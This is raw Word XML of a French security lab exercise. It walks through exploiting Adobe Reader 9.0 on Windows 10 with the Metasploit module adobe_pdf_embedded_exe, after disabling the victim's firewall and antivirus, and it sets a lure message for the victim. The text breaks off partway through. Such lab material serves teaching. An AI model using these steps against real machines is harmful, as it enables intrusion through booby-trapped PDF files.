              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78D3DDBD" w14:textId="23BC8A14" w:rsidR="00A54D6B" w:rsidRDefault="00A54D6B">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101512057" w:history="1">
            <w:r w:rsidRPr="00454952">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
              </w:rPr>
              <w:t>2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00454952">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
              </w:rPr>
              <w:t>Installation et configuration du service fail2ban</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101512057 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F328D">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72EE85E8" w14:textId="7D979325" w:rsidR="00A54D6B" w:rsidRDefault="00A54D6B">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101512058" w:history="1">
            <w:r w:rsidRPr="00454952">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
              </w:rPr>
              <w:t>2.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00454952">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
              </w:rPr>
              <w:t>Installation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101512058 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F328D">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43940500" w14:textId="62AB8EA6" w:rsidR="00A54D6B" w:rsidRDefault="00A54D6B">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101512059" w:history="1">
            <w:r w:rsidRPr="00454952">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
              </w:rPr>
              <w:t>2.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00454952">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
              </w:rPr>
              <w:t>Configuration - WhiteList</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101512059 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F328D">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2090A43F" w14:textId="2677EFC2" w:rsidR="00A54D6B" w:rsidRDefault="00A54D6B">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101512060" w:history="1">
            <w:r w:rsidRPr="00454952">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
              </w:rPr>
              <w:t>2.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00454952">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
              </w:rPr>
              <w:t>Configuration - paramètres d’interdiction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101512060 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F328D">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67F9D728" w14:textId="40B1D25A" w:rsidR="00A54D6B" w:rsidRDefault="00A54D6B">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101512061" w:history="1">
            <w:r w:rsidRPr="00454952">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
              </w:rPr>
              <w:t>2.2.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00454952">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
              </w:rPr>
              <w:t>Prisons Fail2Ban</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101512061 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F328D">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DEEAC18" w14:textId="76C0044D" w:rsidR="004926C9" w:rsidRPr="00836552" w:rsidRDefault="004926C9" w:rsidP="00613461">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00613461">
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:sz w:val="10"/>
              <w:szCs w:val="8"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2726D8D2" w14:textId="420FC857" w:rsidR="00CD6AE9" w:rsidRDefault="00CD6AE9" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="6029CFE8" w14:textId="2CD8849A" w:rsidR="00CD6AE9" w:rsidRDefault="00CD6AE9" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="5F35C460" w14:textId="2CBB8E89" w:rsidR="00CD6AE9" w:rsidRDefault="00CD6AE9" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="3257FAAF" w14:textId="0963D427" w:rsidR="00CD6AE9" w:rsidRDefault="00CD6AE9" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="55CE853A" w14:textId="6ED9F096" w:rsidR="009266BF" w:rsidRDefault="009266BF" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="39EFA7A0" w14:textId="39FE65CA" w:rsidR="009266BF" w:rsidRDefault="009266BF" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="6F93C6DA" w14:textId="13409C8C" w:rsidR="009266BF" w:rsidRDefault="009266BF" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="30C26A5F" w14:textId="2D778B3D" w:rsidR="009266BF" w:rsidRDefault="009266BF" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="415F17E0" w14:textId="7823CA1B" w:rsidR="00CD6AE9" w:rsidRDefault="00CD6AE9" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="100D76EE" w14:textId="71745DBF" w:rsidR="00CD6AE9" w:rsidRDefault="00CD6AE9" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="183D5257" w14:textId="038C8117" w:rsidR="00326E0E" w:rsidRDefault="00326E0E" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="40410CA6" w14:textId="1A8F061D" w:rsidR="00326E0E" w:rsidRDefault="00326E0E" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="7BEA36C9" w14:textId="6344BC52" w:rsidR="00326E0E" w:rsidRDefault="00326E0E" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="5EF98701" w14:textId="25BD1CD0" w:rsidR="00326E0E" w:rsidRDefault="00326E0E" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="63071D2B" w14:textId="22F6F103" w:rsidR="00326E0E" w:rsidRDefault="00326E0E" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="7688B343" w14:textId="755213DD" w:rsidR="00326E0E" w:rsidRDefault="00326E0E" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="68D0EF4E" w14:textId="32798470" w:rsidR="00326E0E" w:rsidRDefault="00326E0E" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="7ADA9540" w14:textId="2E9CACEA" w:rsidR="00326E0E" w:rsidRDefault="00326E0E" w:rsidP="00CD6AE9"/>
    <w:p w14:paraId="37800CB8" w14:textId="1A5D70C5" w:rsidR="00345C1F" w:rsidRPr="00345C1F" w:rsidRDefault="0037611C" w:rsidP="008D37F7">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc101512052"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Faille applicative Acrobat Reader 9.0 sous Windows 10 21H2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3B907FC2" w14:textId="175F4BED" w:rsidR="00287C44" w:rsidRDefault="00287C44" w:rsidP="00287C44">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc101512053"/>
      <w:r>
        <w:t>Pré</w:t>
      </w:r>
      <w:r w:rsidR="0037611C">
        <w:t>requis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3DF07A9F" w14:textId="374B35AC" w:rsidR="0037611C" w:rsidRDefault="0037611C" w:rsidP="0037611C">
      <w:r>
        <w:t xml:space="preserve">Pour les besoins de ce </w:t>
      </w:r>
      <w:r w:rsidR="00326E0E">
        <w:t>TP, il est nécessaire de désactiver le firewall ainsi que la protection en temps réel sur la machine victime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B29430D" w14:textId="04F9C407" w:rsidR="00326E0E" w:rsidRPr="0037611C" w:rsidRDefault="00326E0E" w:rsidP="0037611C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38A93300" wp14:editId="253C7FD0">
            <wp:extent cx="5760720" cy="3236595"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="2095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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3236595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D08A06A" w14:textId="593FB51F" w:rsidR="00A66602" w:rsidRDefault="00A66602" w:rsidP="00A66602"/>
    <w:p w14:paraId="7C145693" w14:textId="33585619" w:rsidR="00326E0E" w:rsidRDefault="007D15E4" w:rsidP="00A66602">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251707392" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06CAF43C" wp14:editId="38F53E00">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4613275</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>227330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1162050" cy="1162050"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-354" y="-354"/>
                <wp:lineTo x="-354" y="21600"/>
                <wp:lineTo x="21600" y="21600"/>
                <wp:lineTo x="21600" y="-354"/>
                <wp:lineTo x="-354" y="-354"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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Nous allons utiliser le Framework metasploit.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D15E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEBDD97" w14:textId="1B011327" w:rsidR="007D15E4" w:rsidRDefault="007D15E4" w:rsidP="00A66602">
      <w:r w:rsidRPr="007D15E4">
        <w:t>Metasploit, Metasploit Pen Testing Tool, est un projet en relation avec la sécurité des systèmes informatiques. Son but est de fournir des informations sur les vulnérabilités de systèmes informatiques, d'aider à la pénétration et au développement de signatures pour les systèmes de détection d'intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13488741" w14:textId="6079720C" w:rsidR="007D15E4" w:rsidRDefault="007D15E4" w:rsidP="00A66602"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B913CF" w14:paraId="7751051C" w14:textId="77777777" w:rsidTr="00B913CF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B60138F" w14:textId="5C780EB4" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00B913CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Machine malicieuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FDB336F" w14:textId="744210A6" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00B913CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Machine victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B913CF" w14:paraId="5E9940C4" w14:textId="77777777" w:rsidTr="00B913CF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A3DF090" w14:textId="76267827" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00A66602">
            <w:r>
              <w:t>OS Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3542CC02" w14:textId="4CD1DB2B" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00A66602">
            <w:r>
              <w:t>OS Windows 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B913CF" w14:paraId="1A80C143" w14:textId="77777777" w:rsidTr="00B913CF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13F7595D" w14:textId="36957855" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00A66602">
            <w:r>
              <w:t>192.168.0.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="132C0321" w14:textId="48E88C5F" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00A66602">
            <w:r>
              <w:t>192.168.0.47</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B913CF" w14:paraId="45884B91" w14:textId="77777777" w:rsidTr="00B913CF">
        <w:trPr>
          <w:trHeight w:val="1176"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38568974" w14:textId="4D095AF4" w:rsidR="00B913CF" w:rsidRDefault="006A28F6" w:rsidP="006A28F6">
            <w:pPr>
              <w:pStyle w:val="Paragraphedeliste"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Activer le service Apache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25ECF985" w14:textId="0F2552FF" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00B913CF">
            <w:pPr>
              <w:pStyle w:val="Paragraphedeliste"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Installer Adobe Reader 9.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="549B15F7" w14:textId="77777777" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00B913CF">
            <w:pPr>
              <w:pStyle w:val="Paragraphedeliste"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Désactiver antivirus</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D2D7092" w14:textId="77777777" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00B913CF">
            <w:pPr>
              <w:pStyle w:val="Paragraphedeliste"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Désactiver protection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AE3F058" w14:textId="767C8B7F" w:rsidR="006A28F6" w:rsidRDefault="006A28F6" w:rsidP="006A28F6">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D34A840" w14:textId="77777777" w:rsidR="00020374" w:rsidRDefault="00020374" w:rsidP="00020374"/>
    <w:p w14:paraId="076CFAB9" w14:textId="77777777" w:rsidR="00020374" w:rsidRDefault="00020374" w:rsidP="00020374"/>
    <w:p w14:paraId="397329F7" w14:textId="345DA418" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00B913CF">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc101512054"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Commandes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6E46899E" w14:textId="175298D1" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00B913CF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Sur la machine, lancer metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAACA2" w14:textId="361C797C" w:rsidR="00B913CF" w:rsidRDefault="00B913CF" w:rsidP="00B913CF">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D5413" w14:textId="7132172C" w:rsidR="00B913CF" w:rsidRDefault="004C3D9F" w:rsidP="006A28F6">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’interface de metasploit apparaît, on </w:t>
      </w:r>
      <w:r w:rsidR="006A28F6">
        <w:t>exécute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’exploit souhaité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5F1850" w14:textId="7D0B8E39" w:rsidR="004C3D9F" w:rsidRDefault="006A28F6" w:rsidP="006A28F6">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251709440" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08E49878" wp14:editId="25568125">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="3350895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21489"/>
                <wp:lineTo x="21500" y="21489"/>
                <wp:lineTo x="21500" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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350895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="004C3D9F">
        <w:t>use exploit/Windows/fileformat/adobe_pdf_embedded_exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED8A47D" w14:textId="77777777" w:rsidR="006A28F6" w:rsidRDefault="006A28F6" w:rsidP="006A28F6">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C01204D" w14:textId="5BCC11ED" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="006A28F6">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Afin de modifier le message à afficher à la victime on execute la commande suivante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61374FED" w14:textId="2A8C1BFB" w:rsidR="004C3D9F" w:rsidRPr="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="004C3D9F">
        <w:t>set LAUNCH_MESSAGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>message à afficher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D261A55" w14:textId="5C1A250E" w:rsidR="004C3D9F" w:rsidRDefault="006A28F6" w:rsidP="004C3D9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F69D32B" wp14:editId="720C5EC1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>250190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21214"/>
                <wp:lineTo x="21500" y="21214"/>
                <wp:lineTo x="21500"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pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId15" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
